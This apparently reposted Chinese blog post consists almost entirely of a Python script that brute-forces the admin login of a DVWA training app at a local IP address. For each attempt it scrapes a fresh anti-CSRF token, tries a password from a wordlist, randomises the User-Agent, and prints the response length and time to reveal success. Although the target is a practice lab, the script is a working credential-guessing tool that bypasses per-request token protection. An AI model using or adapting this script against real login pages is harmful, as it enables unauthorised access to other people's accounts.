效果
源码
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2021/9/3 13:01
# @Author : AA8j
# @Site :
# @File : test2.py
# @Software: PyCharm
import re
import requests
from fake_useragent import UserAgent
def post(url, headers, data, time):
response = req.post(url, headers=headers, data=data, timeout=time)
response.encoding = 'utf-8'
return response
def get_token(html):
pattern = re.compile(r"<input type='hidden' name='user_token' value='(.*?)' />")
token = pattern.search(html).group(1)
return token
def read_password(path):
pwd_list = []
with open(path, 'r') as f:
for pwd in f:
if '\n' in pwd:
pwd_list.append(pwd.split('\n')[0])
else:
pwd_list.append(pwd)
return pwd_list
if __name__ == '__main__':
ua = UserAgent()
HEADERS = {'User-Agent': ua.random}
# 随机UA头
req = requests.session()
TIMEOUT = 3
# 超时时间
URL = 'http://192.168.8.46/DVWA-2.0.1/login.php'
Pwd_list = read_password('./passwords.txt')
for Pwd in Pwd_list:
# 访问网站获得token
DATA = {}
TOKEN = get_token(post(URL, HEADERS, DATA, TIMEOUT).text)
print(f'\r正在使用密码 {Pwd.ljust(10)} 尝试登录。', end='')
# 将token带上登录网站
DATA = {'username': 'admin', 'password': Pwd, 'Login': 'Login', 'user_token': TOKEN}
Response = post(URL, HEADERS, DATA, TIMEOUT)
HTML = Response.text
print('响应长度:', len(HTML), end='。')
# 也可以设置不跳转的方式,看重定向的位置来判断是否登陆成功
print('响应时间:', Response.elapsed)
本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。
